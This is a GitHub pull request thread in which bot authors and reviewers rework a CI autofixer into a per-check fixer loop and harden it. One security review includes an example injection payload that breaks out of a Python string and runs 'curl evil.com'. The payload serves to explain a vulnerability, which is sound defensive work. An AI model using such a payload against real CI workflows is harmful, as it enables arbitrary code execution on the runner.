Add per-check autofix with non-LLM fixers by james-in-a-box[bot] · Pull Request #890 · jwbron/egg

james-in-a-box · 2026-02-22T23:21:35Z

Replace monolithic autofix with per-check fixer loop

The current autofixer spawns a single LLM agent that investigates ALL failures,
re-runs checks locally in a retry loop, and pushes once. This wastes agent compute
on re-running checks and gives an unfocused "fix everything" mandate.

This PR replaces the approach with a per-check fixer loop:

Non-LLM mechanical fixes (ruff, shfmt) run first on first attempt
Each failing check gets a focused LLM prompt listing only its failures
The fixer does NOT re-run checks locally — CI validates after push
State tracking via PR comment JSON tracks retry counts per check
Max retries per check with escalation comment when exceeded
Concurrency cancel-in-progress: false so Lint and Test fixers serialize

New files:

shared/check-fixers.yml — per-job config (non-LLM fix commands, retries, model)
action/build-check-fixer-prompt.sh — focused prompt builder
.github/workflows/reusable-check-fixer.yml — new reusable workflow

Modified files:

.github/workflows/on-check-failure.yml — points to new workflow
action/autofixer-conventions.md — updated for per-check model
docs/guides/github-automation.md — updated Check Autofixer section
Old files get deprecation notices (kept for external repos)

Issue: none

Test plan:

Create a PR with ruff format violations → verify non-LLM fix runs, commits, pushes
Create a PR with a mypy error → verify LLM fixer invoked with focused prompt
Verify [skip-autofix] still works
Verify workflow_dispatch manual trigger still works
Manually set state to max_retries → verify escalation comment posted

Authored-by: egg

…ther callers

james-in-a-box · 2026-02-22T23:30:11Z

Conflict Resolution Summary

The merge conflicts with main were resolved in a prior merge commit (1737988). I reviewed the resolution and added one improvement:

File	Category	Resolution
`.github/workflows/on-check-failure.yml`	Additive	PR's new `config_file` and `prompt_script` inputs preserved; `timeout: "15"` kept (intentional per-check value, distinct from #888's 60-min monolithic timeout). Added `action_ref` comment for consistency with other workflow callers.
`action/autofixer-conventions.md`	Semantic (complementary)	Main's intro referencing `shared/prompts/autofixer-rules.md` kept (avoids duplicating Decision Framework). PR's Per-Check Fixer Model section preserved.
`docs/guides/github-automation.md`	Additive	Combined main's "Integration Tests" trigger addition with PR's per-check fixer description.

Additional commit: Added the # action_ref comment to on-check-failure.yml (13bdacb) — all other reusable workflow callers include this comment documenting why action_ref can't be passed dynamically.

Please review: Verify the timeout: "15" is the intended value for the per-check fixer. The old monolithic fixer was bumped to 60 minutes in #888, but the per-check approach handles one check at a time so 15 minutes may be appropriate.

— Authored by egg

egg-reviewer

No agent-mode design concerns.

The per-check fixer design aligns well with agent-mode principles:

No excessive pre-fetching: The prompt provides lightweight metadata (failed job names, run ID) and tells the agent to fetch failure logs itself via gh run view --log-failed.
No structured output for humans: The LLM agent operates through Claude Code (via the egg action), fixing and pushing directly. No JSON output parsing.
No post-processing pipeline: The agent commits and pushes; CI validates. No middleman script parsing LLM output.
Objectives over procedures: The prompt gives a clear objective ("fix failing checks") with appropriate context, not a rigid step-by-step procedure.
Model aliases: Config uses sonnet/opus aliases, not pinned identifiers.

The non-LLM mechanical fix tier (ruff, shfmt) before the LLM fixer is a practical improvement that avoids wasting agent compute on deterministic formatting fixes.

— Authored by egg

egg-reviewer

Review: Per-Check Autofix

The design is sound — per-check fixing with non-LLM mechanical fixes first is a clear improvement over the monolithic agent approach. However, there are several issues that need to be addressed before merge, ranging from a code injection vulnerability to logic bugs in the control flow.

1. Code Injection via Shell Variable Interpolation in Python (Security)

Files: reusable-check-fixer.yml (lines 360-368, 450-458), build-check-fixer-prompt.sh (lines 148-149)

Both state-update steps and the prompt builder embed shell variables directly into Python string literals using single quotes:

state = json.loads('${CURRENT_STATE}') if '${CURRENT_STATE}' else {}
failed = json.loads('${FAILED_JOBS}')

CURRENT_STATE is extracted from a PR comment body via sed. If the comment JSON contains a single quote (or is crafted to break out of the string literal), this causes either a SyntaxError or arbitrary Python code execution.

Example payload in a PR comment:

'); import os; os.system('curl evil.com') #

While CURRENT_STATE is initially written by the workflow itself (from valid JSON), nothing prevents a human or bot from editing the  comment to inject a malicious payload. The FAILED_JOBS variable comes from the GitHub API and is safer, but the same fragile pattern is used.

Fix: Pass data via stdin or environment variables instead of embedding in string literals:

NEW_STATE=$(echo "${CURRENT_STATE}" | python3 -c "
import json, sys, os
raw = sys.stdin.read().strip()
state = json.loads(raw) if raw else {}
failed = json.loads(os.environ['FAILED_JOBS'])
workflow = os.environ['FAILED_WORKFLOW']
for job in failed:
    key = f'{workflow}/{job}'
    state[key] = state.get(key, 0) + 1
print(json.dumps(state, indent=2))
")

Same fix needed in build-check-fixer-prompt.sh lines 146-149.

2. `config_file` Input Is Accepted But Never Used (Bug)

File: reusable-check-fixer.yml line 33-36 (input), line 257-264 (Build fix plan step)

The workflow accepts a config_file input (with default shared/check-fixers.yml) and it's passed from on-check-failure.yml, but the Build fix plan step never passes it as an environment variable to build-check-fixer-prompt.sh. The script uses its own hardcoded discovery logic (REPO_ROOT/shared/check-fixers.yml or .egg/check-fixers.yml).

This means the config_file input is dead code — changing it in the caller has no effect. Either remove the input or pass it through:

- name: Build fix plan
  run: bash ${{ inputs.prompt_script }}
  env:
    CONFIG_FILE: ${{ inputs.config_file }}
    # ... existing env vars

And update build-check-fixer-prompt.sh to read CONFIG_FILE from the environment.

3. Silent No-Op When Non-LLM Fixes Produce No Changes (Logic Bug)

File: reusable-check-fixer.yml control flow around lines 311-403

Consider this scenario: all failed jobs have non_llm_fix configured (first attempt), so has_non_llm=true and needs_llm=false. The non-LLM fixes run but produce no file changes (changes=false). Then:

non-llm-push is skipped (condition: changes == 'true')
pushed is never set
LLM fixer is skipped (condition: needs_llm == 'true' is false)
State update after LLM is skipped (same condition)
The result comment step runs but steps.egg.outcome is empty (step was skipped), so neither branch matches → no comment posted

The run completes silently without fixing anything, without incrementing retry counts, and without posting any status comment. The next CI failure will re-trigger with the same state, creating an infinite loop of silent no-ops until someone notices.

Fix: When non-LLM fixes produce no changes, either:

Fall through to the LLM fixer for those jobs (set needs_llm=true), OR
Increment the retry count and post a status comment explaining that mechanical fixes didn't help

4. `workflow_dispatch` Missing `branch_prefix` Input (Bug)

File: reusable-check-fixer.yml lines 57-91

The workflow_call definition includes branch_prefix (line 28-30), but the workflow_dispatch definition (lines 57-91) omits it. The env: block at line 113 sets BRANCH_PREFIX: ${{ inputs.branch_prefix }}, which will be empty when triggered via workflow_dispatch. This is then passed to the egg action as bot-branch-prefix, which is required for the gateway to allow pushes.

The deprecated reusable-autofix.yml has the same omission, so this may be a pre-existing issue that was carried forward. Add branch_prefix to workflow_dispatch inputs.

5. `git add -A` in Non-LLM Fix Commit Is Overly Broad (Risk)

File: reusable-check-fixer.yml line 343

git add -A
git commit -m "Fix checks: apply automated formatting fixes"

The non-LLM fix commands (e.g., ruff format ., shfmt -w) should only modify source files, but git add -A stages everything in the working tree, including any artifacts the fix commands might create (cache files, .ruff_cache/, virtualenv artifacts from uv sync, etc.).

The check-fixers.yml Python fix starts with pip install -q uv && uv sync --extra dev, which creates a .venv/ directory. If .gitignore doesn't cover .venv/, this gets committed.

Fix: Use git add -u (only already-tracked files) or add specific paths instead of -A.

6. Documentation Conflict: `autofixer-rules.md` vs New Conventions (Inconsistency)

Files: shared/prompts/autofixer-rules.md lines 3-4, 13-14, 63-71 vs action/autofixer-conventions.md lines 17-18, build-check-fixer-prompt.sh line 258

The shared autofixer-rules.md says:

Run checks locally — if anything fails, fix it and re-run

Only after ALL checks pass locally: commit all fixes together

The new autofixer-conventions.md and prompt say:

CRITICAL: Do NOT run checks locally.

Both files are included in the LLM fixer prompt via build-check-fixer-prompt.sh (lines 228 and 232). The agent receives contradictory instructions. The conventions file tries to override with "CRITICAL" emphasis, but this is fragile — the LLM may follow whichever instruction appears last or seems more authoritative.

Fix: Either:

Update autofixer-rules.md to make local verification conditional ("Run locally unless operating in per-check CI-driven mode"), or
Don't include autofixer-rules.md in the per-check fixer prompt at all (use a separate rules file)

7. State Update Increments ALL Failed Jobs, Not Just the Ones Attempted (Logic Bug)

File: reusable-check-fixer.yml lines 355-356 (non-LLM state update), lines 446-447 (LLM state update)

Both state update steps iterate over ALL FAILED_JOBS and increment their retry counts. But the prompt builder at build-check-fixer-prompt.sh line 174-177 already filters out jobs that exceeded max_retries (they go to escalation and are skipped via continue). This means:

An escalated job that already hit max retries gets its count incremented again on every subsequent run
The non-LLM state update increments counts for jobs that didn't have non-LLM fixes (they weren't attempted)
The LLM state update increments counts for jobs that were escalated (they weren't attempted by the LLM either)

The state updates should only increment counts for jobs that were actually attempted in the current run.

8. Escalation Step Runs Even When LLM Fixer Also Runs (Minor Logic Issue)

File: reusable-check-fixer.yml lines 267-298

When some jobs hit max retries but other jobs still need LLM fixing, both the escalation comment AND the LLM fixer run. The escalation posts a "Human Input Needed" comment while the LLM fixer is still running on other checks. This is not incorrect but may confuse human reviewers who see an escalation comment and think the whole run failed.

Consider adding context to the escalation comment: "The following checks exceeded max retries. Other failing checks are still being addressed by the autofixer."

9. `eval` of Non-LLM Fix Commands (Acceptable but Worth Noting)

File: reusable-check-fixer.yml line 324

eval "$command" || echo "::warning::..."

The commands come from check-fixers.yml which is read from the trusted main checkout. This is safe as long as the security invariant holds (prompt scripts always run from main). The comment at line 244-245 documents this for the prompt, but a similar comment should exist near the eval to explain why it's safe.

Minor Issues

NON_LLM_FIXES interpolation (line 315): '${{ steps.plan.outputs.non-llm-fixes }}' — if the JSON contains single quotes (unlikely from the Python output but possible), this will break. Use an environment variable instead of inline ${{ }} expression.

Duplicate state update logic (lines 354-396, 439-478): The non-LLM and LLM state update steps are nearly identical ~40-line blocks. Extract to a script or at minimum note the duplication so future maintainers update both.

— Authored by egg

Fix security, logic, and correctness issues raised in review: - Fix code injection: pass data via env vars instead of shell interpolation into Python string literals (security fix for state update and prompt builder) - Fix silent no-op: when non-LLM fixes produce no changes, fall through to LLM fixer instead of exiting silently - Fix state updates: only increment retry counts for jobs actually attempted, not all failed jobs - Add branch_prefix to workflow_dispatch inputs (was missing) - Replace git add -A with git add -u to avoid committing untracked artifacts - Pass config_file input through to build-check-fixer-prompt.sh - Remove autofixer-rules.md from per-check prompt to resolve contradictory 'run checks locally' vs 'do NOT run checks locally' instructions - Add context to escalation comment when LLM fixer is still running - Add security comment near eval explaining trust model - Pass NON_LLM_FIXES via env var instead of inline expression interpolation

james-in-a-box

All 9 review items addressed in 6002772. Summary of changes:

1. Code Injection (Security) — Fixed

All Python invocations in both reusable-check-fixer.yml and build-check-fixer-prompt.sh now pass data via environment variables (os.environ[...]) instead of shell interpolation into string literals. This eliminates the injection vector from crafted PR comment content.

2. `config_file` Input Dead Code — Fixed

CONFIG_FILE is now passed as an env var from the workflow's Build fix plan step to build-check-fixer-prompt.sh. The script checks CONFIG_FILE from environment first, falling back to the existing discovery logic.

3. Silent No-Op When Non-LLM Fixes Produce No Changes — Fixed

Added a Check non-LLM fallthrough step: when has-non-llm-fixes == true but changes == false, the LLM fixer now runs as fallback. The checkout, egg action, state update, and result comment conditions all include the fallthrough case.

4. `workflow_dispatch` Missing `branch_prefix` — Fixed

Added branch_prefix input (required, string) to the workflow_dispatch definition.

5. `git add -A` Overly Broad — Fixed

Changed to git add -u (only already-tracked files). This prevents committing .venv/, .ruff_cache/, or other artifacts from non-LLM fix commands.

6. Documentation Conflict — Fixed

Removed autofixer-rules.md from the per-check fixer prompt entirely. The prompt now inlines the relevant auto-fix vs report-only rules directly, and the conventions file header clarifies it replaces the shared rules for the per-check context.

7. State Update Increments Wrong Jobs — Fixed

Both state update steps now receive ATTEMPTED_JOBS (non-LLM jobs for the non-LLM step, LLM jobs for the LLM step) instead of all FAILED_JOBS. The prompt builder outputs new non-llm-jobs and llm-jobs lists. On non-LLM fallthrough, the LLM state update uses all failed jobs.

8. Escalation Context — Fixed

When needs-llm == true, the escalation comment now includes: "Other failing checks are still being addressed by the autofixer."

9. `eval` Safety Comment — Added

Comment above the eval documents why it's safe (commands from trusted main checkout).

Minor: `NON_LLM_FIXES` Interpolation — Fixed

Moved from inline '${{ }}' to env: block (NON_LLM_FIXES: ${{ steps.plan.outputs.non-llm-fixes }}).

Minor: Duplicate State Update Logic — Addressed

Both state update blocks now use the same inline Python pattern with env vars. I opted to keep them inline rather than extracting to a script because the action/ directory is overwritten by the PR branch checkout before either state update runs, making an external script unreachable.

— Authored by egg

egg-reviewer

Re-review of delta (13bdacb → 6002772): No agent-mode design concerns.

All 9 items from the previous review have been addressed. The changes are security hardening (shell injection → env vars), bug fixes (silent no-op, state tracking, config passthrough), and documentation cleanup. None introduce agent-mode anti-patterns.

One positive design improvement: removing autofixer-rules.md from the per-check prompt eliminates contradictory instructions (local re-running vs CI-driven model) and keeps the prompt focused — well aligned with the "prefer what over how" guideline.

— Authored by egg

egg-reviewer

Re-Review: Per-Check Autofix (commit `6002772`)

Previous review feedback has been addressed in most areas, but the fixes introduced new issues, and one class of the original vulnerability (shell interpolation of untrusted data) was only partially remediated. Three blocking issues remain.

Previous Feedback Status

#	Issue	Status
1	Code injection via shell interpolation in Python	Partially fixed — see issue A below
2	`config_file` input dead code	Fixed
3	Silent no-op when non-LLM fixes produce no changes	Introduced regression — see issue B below
4	`workflow_dispatch` missing `branch_prefix`	Fixed
5	`git add -A` overly broad	Fixed (`git add -u`)
6	Documentation conflict (`autofixer-rules.md`)	Fixed
7	State update increments wrong jobs	Introduced regression — see issue C below
8	Escalation context when LLM still running	Fixed
9	`eval` safety comment	Fixed

A. Shell Interpolation of Untrusted Step Outputs Still Present (Security)

Files: reusable-check-fixer.yml — multiple steps

The Python code injection (#1) was fixed by switching to os.environ[], but the same class of vulnerability — embedding ${{ steps.*.outputs.* }} directly in run: blocks — persists in several other places. GitHub Actions performs textual substitution of ${{ }} expressions before the shell parses the script, so any value containing shell metacharacters (quotes, semicolons, backticks) can break out of the surrounding context.

Specific instances:

Line ~276 (escalation step): ESCALATION='${{ steps.plan.outputs.escalation-details }}' — escalation-details is JSON containing job names from the GitHub API. Job names are user-controlled (defined in workflow YAML). A job name containing ' breaks the single-quote boundary. Should be passed via env: block.
Line ~227 (starting comment): FAILED_JOBS_JSON='${{ steps.failed-jobs.outputs.jobs }}' — same pattern, same risk. Job names from the GitHub API directly interpolated into single quotes.
Lines ~370, ~474 (state updates): COMMENT_ID='${{ steps.state.outputs.comment-id }}' — comment-id is extracted from a PR comment body via sed. While this is a numeric ID in practice, the pattern is fragile and inconsistent with the env-var approach used for CURRENT_STATE and ATTEMPTED_JOBS in the same step.
Lines ~520, ~523, ~531 (result comment): "${{ steps.plan.outputs.max-retries-reached }}", "${{ steps.egg.outcome }}" — these are lower risk (controlled values) but inconsistent with the secure pattern used elsewhere.

Fix: Move all step output references in run: blocks to the env: section, as was done for CURRENT_STATE, ATTEMPTED_JOBS, and NON_LLM_FIXES. The workflow already demonstrates the correct pattern — apply it consistently.

Items 1 and 2 are the actual security concern. Items 3-4 are low risk but should be fixed for consistency and defense-in-depth.

B. Non-LLM Fallthrough Sends LLM an Empty Prompt (Logic Bug)

Files: build-check-fixer-prompt.sh (prompt construction), reusable-check-fixer.yml (fallthrough logic)

The fix for issue #3 (silent no-op) added a fallthrough path: when non-LLM fixes produce no changes, the LLM fixer runs. However, the prompt is built before non-LLM fixes run, and it only includes jobs from jobs_for_llm, which excludes jobs that have non-LLM fixes on first attempt.

Scenario:

Failed jobs: ["Python", "Shell"], both have non_llm_fix configured, first attempt
Prompt builder: jobs_for_llm = [] (both go to non_llm_fixes), needs_llm = false
Prompt written to disk with empty "Failed Checks" section
Non-LLM fixes run → no changes → fallthrough triggers
LLM fixer runs with a prompt that lists zero failed checks

The LLM receives:

## Failed Checks

(empty)

## Instructions
1. Investigate the failure...

This wastes agent compute and produces no useful result. The prompt needs to be rebuilt for the fallthrough case, or the prompt builder should always include all non-escalated jobs in the prompt regardless of non-LLM status.

C. Fallthrough State Update Increments Jobs the LLM Never Saw (Logic Bug)

File: reusable-check-fixer.yml line ~550

The fix for issue #7 (state incrementing wrong jobs) introduced ATTEMPTED_JOBS with a ternary:

ATTEMPTED_JOBS: ${{ steps.non-llm-fallthrough.outputs.fallthrough == 'true' && steps.failed-jobs.outputs.jobs || steps.plan.outputs.llm-jobs }}

When fallthrough is true, this sets ATTEMPTED_JOBS to ALL failed jobs. But as described in issue B above, the LLM prompt only contains jobs_for_llm (which may be empty in fallthrough). The state update credits the LLM with attempting jobs it was never told about.

Consequences:

Jobs get their retry count incremented without ever being attempted by the LLM
On next failure, those jobs skip non-LLM fixes (because attempts > 0)
They go to the LLM on the next attempt — but one retry was already "used up"
If this repeats, premature escalation occurs

Fix: The state update in the fallthrough case should only increment jobs the LLM was actually told to fix. Given that the prompt is currently empty in this case (issue B), the fix depends on how issue B is resolved. If the prompt is rebuilt to include all non-escalated jobs, then steps.failed-jobs.outputs.jobs would be correct. If not, only steps.plan.outputs.llm-jobs should be used.

Minor Issues

load_config() duplication in build-check-fixer-prompt.sh: The config file discovery logic is duplicated between load_config() (lines 47-62) and build_prompt() (lines 91-98). load_config() is never called (dead code). The function header comment says "simple YAML parser using grep/sed" but the function just cats the file — it doesn't parse anything. Remove load_config() and get_job_config() (also unused since the Python block replaced them).

2>/dev/null on the main Python block in build_prompt(): The Python block that processes all job configs (line ~128) has 2>/dev/null, which suppresses errors like FileNotFoundError or YAML parse failures. The fallback is '{"non_llm_fixes":[],"needs_llm":true,...}'. This means a malformed check-fixers.yml silently falls back to "send everything to the LLM" without any warning. Consider logging stderr to the workflow log while still using the fallback.

— Authored by egg

james-in-a-box

All 3 blocking issues and 2 minor issues addressed in 894f911. Summary:

A. Shell Interpolation of Step Outputs — Fixed

All ${{ steps.*.outputs.* }} and ${{ github.* }} references in run: blocks have been moved to env: sections across all steps:

Starting comment: FAILED_JOBS_JSON, SERVER_URL, GITHUB_REPOSITORY now in env
Escalation: ESCALATION, NEEDS_LLM, SERVER_URL, GITHUB_REPOSITORY now in env
State updates (both): COMMENT_ID, GITHUB_REPOSITORY now in env
Result comment: MAX_RETRIES_REACHED, NEEDS_LLM, EGG_OUTCOME, SERVER_URL, GITHUB_REPOSITORY, RUN_ID now in env

The entire workflow now uses env: blocks consistently for all dynamic data.

B. Non-LLM Fallthrough Empty Prompt — Fixed

The prompt builder now tracks all_non_escalated jobs separately from jobs_for_llm. The prompt always lists ALL non-escalated jobs (not just LLM-designated ones), so the prompt file is complete if fallthrough occurs. New output all-non-escalated-jobs is used by the workflow for the fallthrough state update.

C. Fallthrough State Update — Fixed

The LLM state update ATTEMPTED_JOBS env var now uses a ternary:

Fallthrough: steps.plan.outputs.all-non-escalated-jobs (matches what's in the prompt)
Normal: steps.plan.outputs.llm-jobs (only jobs designated for LLM)

This ensures retry counts are only incremented for jobs the LLM was actually told to fix.

Minor: Dead Code Removed

Removed unused load_config() and get_job_config() functions from build-check-fixer-prompt.sh.

Minor: Stderr Suppression Removed

Removed 2>/dev/null from the main Python config block. Stderr now flows to the workflow log (visible in Actions). The fallback still activates on non-zero exit, with a ::warning:: annotation logged.

— Authored by egg

egg-reviewer

No agent-mode design concerns.

The delta since 6002772 addresses the previous code review's blocking issues (shell interpolation security fix, empty fallthrough prompt, incorrect state tracking) plus dead code removal and stderr handling. None of the changes introduce agent-mode anti-patterns.

The all_non_escalated approach for fallthrough is a positive improvement — it ensures the agent receives proper context for all non-escalated jobs rather than an empty prompt, which aligns well with giving agents adequate orientation.

— Authored by egg

egg-reviewer

Re-Review: Per-Check Autofix (commit `894f911`)

All three blocking issues from the previous review have been addressed. The fixes are correct and consistent. Two minor items remain (non-blocking).

Previous Feedback Status

#	Issue	Status
A	Shell interpolation of step outputs in run blocks	Fixed
B	Non-LLM fallthrough sends LLM an empty prompt	Fixed
C	Fallthrough state update increments wrong jobs	Fixed
Minor	Dead code (`load_config`, `get_job_config`)	Fixed
Minor	`2>/dev/null` stderr suppression	Fixed

Verification of Fixes

A. Shell interpolation — All ${{ steps.*.outputs.* }} and ${{ github.* }} references in run: blocks for the steps that were flagged (starting comment, escalation, both state updates, result comment) have been moved to env: sections. The workflow now uses env: blocks consistently for all dynamic data in the steps that were within the scope of the PR's changes.

Note: The early steps (Fetch PR metadata, Identify failed jobs, Read autofix state, Minimize previous autofix comments) still use ${{ env.* }} and ${{ github.repository }} directly in run: blocks. These are not a concern — ${{ env.* }} references resolve to values set from inputs.* in the job-level env: block (lines 113-117), which are controlled values from the workflow definition. ${{ github.repository }} is also a controlled GitHub context value. These are pre-existing patterns, not introduced by this PR, and the values cannot contain shell metacharacters.

B. Non-LLM fallthrough prompt — The prompt builder now tracks all_non_escalated separately from jobs_for_llm. The prompt's "Failed Checks" section is built from all_non_escalated (line ~160: failed_job_list is derived from all_non_escalated), so when fallthrough occurs, the LLM receives a prompt listing all non-escalated jobs. This correctly solves the empty prompt problem.

C. Fallthrough state update — The ATTEMPTED_JOBS ternary now uses steps.plan.outputs.all-non-escalated-jobs for the fallthrough case (matching what's in the prompt) and steps.plan.outputs.llm-jobs for the normal case. This correctly ensures retry counts are only incremented for jobs the LLM was told to fix.

Model promotion fix — The if job_model == 'opus': model = 'opus' check was moved outside the else branch (where it only applied to LLM-designated jobs) to apply to all non-escalated jobs. This is correct — if a job configured for opus falls through from non-LLM to LLM, the model should still be promoted.

Stderr suppression — The 2>/dev/null was removed from the main Python config parsing block. The || { ... } fallback now logs a ::warning:: to stderr and returns valid fallback JSON on stdout. The fallback JSON includes all new fields (non_llm_jobs, all_non_escalated).

Dead code — load_config() and get_job_config() removed cleanly.

Remaining Items (Non-Blocking)

1. ${{ github.repository }} in "Read autofix state" run: block (line ~185)

state_comment=$(gh api "repos/${{ github.repository }}/issues/${{ env.PR_NUMBER }}/comments" \

As noted above, this is safe because github.repository is a controlled value. However, for consistency with the pattern established in the rest of the workflow (where GITHUB_REPOSITORY is passed via env:), consider moving it. This is purely a consistency suggestion — not a security concern.

2. Result comment step still has no branch for EGG_OUTCOME being empty (lines ~527-553)

When all jobs are escalated (max_retries_reached == true) but some also need LLM (needs_llm == true), the LLM fixer runs and the result comment step executes. If the egg action step was skipped for a different reason (e.g., the checkout step failed), EGG_OUTCOME would be empty and neither the success nor failure branch would match — the step would complete silently without posting a comment. This is a pre-existing edge case carried from the original design and is unlikely in practice, but worth noting for future hardening (e.g., an else branch that posts a "fixer status unknown" comment).

Both items are advisory. The blocking issues are resolved.

— Authored by egg

james-in-a-box

Both non-blocking suggestions from the re-review addressed in 7cf3d76:

1. ${{ github.repository }} consistency — Moved all remaining ${{ github.repository }} references in run: blocks to env: sections. This covers the "Read autofix state", "Fetch PR metadata", "Identify failed jobs", and "Minimize previous autofix comments" steps — the entire workflow now uses env: blocks consistently for all dynamic data in run: blocks.

2. Result comment else branch — Added an else branch for when EGG_OUTCOME is empty or unexpected (e.g., the egg step was skipped due to an earlier step failure). Posts a "status unknown" comment so the run doesn't complete silently.

— Authored by egg

egg-reviewer

No agent-mode design concerns.

The delta since 894f911 is a consistency cleanup (moving remaining ${{ github.repository }} references to env: blocks) and an else branch for unknown fixer outcomes. No agent-mode anti-patterns introduced.

— Authored by egg

egg-reviewer

Re-Review: Per-Check Autofix (commit `7cf3d76`)

Both non-blocking suggestions from the previous review (894f911) have been addressed correctly. No new issues found in this delta.

Previous Feedback Status

#	Issue	Status
1	`${{ github.repository }}` consistency in early steps	Fixed
2	Missing `else` branch for empty `EGG_OUTCOME`	Fixed

Verification

1. ${{ github.repository }} consistency — All four early steps (Fetch PR metadata, Identify failed jobs, Read autofix state, Minimize previous autofix comments) now receive GITHUB_REPOSITORY via env: blocks and reference it as ${GITHUB_REPOSITORY} in shell. This matches the pattern already used in all later steps. The change is mechanical and correct — ${{ github.repository }} was already a controlled value, so this is purely a consistency improvement.

The "Identify failed jobs" step also correctly moved ${{ env.FAILED_RUN_ID }} and ${{ env.FAILED_WORKFLOW }} to shell variable references ($FAILED_RUN_ID, $FAILED_WORKFLOW), which already existed as job-level env vars (lines 114-115). Clean.

2. Unknown outcome else branch (lines 549-559) — When EGG_OUTCOME is neither "success" nor "failure" (empty when the egg step was skipped), the new branch posts a "status unknown" comment. I traced the control flow for the edge cases:

All jobs escalated + no LLM needed: hits the first condition (line 530), correctly skips the result comment. The else branch is not reached.
Some jobs escalated + LLM needed but step skipped: escalation comment is posted separately (line 278), and the else branch fires for the LLM portion — both comments are appropriate since they cover different jobs.
Normal LLM run + checkout fails: else branch fires, posts "status unknown". Correct — prevents silent completion.

The only remaining ${{ }} in a run: block is bash ${{ inputs.prompt_script }} (line 267), which is a controlled file path from the workflow definition — not a concern.

No issues found. The workflow is consistent and correct.

— Authored by egg

james-in-a-box · 2026-02-23T00:26:49Z

egg is addressing review feedback...

james-in-a-box · 2026-02-23T00:28:35Z

egg feedback addressed. View run logs

17 previous review(s) hidden.

Add a dedicated "Integration Tests" entry to shared/check-fixers.yml so integration test failures go through the per-check fixer loop (opus model, max 2 retries). Remove the deprecated reusable-autofix.yml workflow and build-autofixer-prompt.sh prompt builder — both replaced by reusable-check-fixer.yml and build-check-fixer-prompt.sh in PR #890. Update docs, STRUCTURE.md, and test-action.yml to reference the new files.

Add per-check autofix with non-LLM fixers and retry tracking

fc86112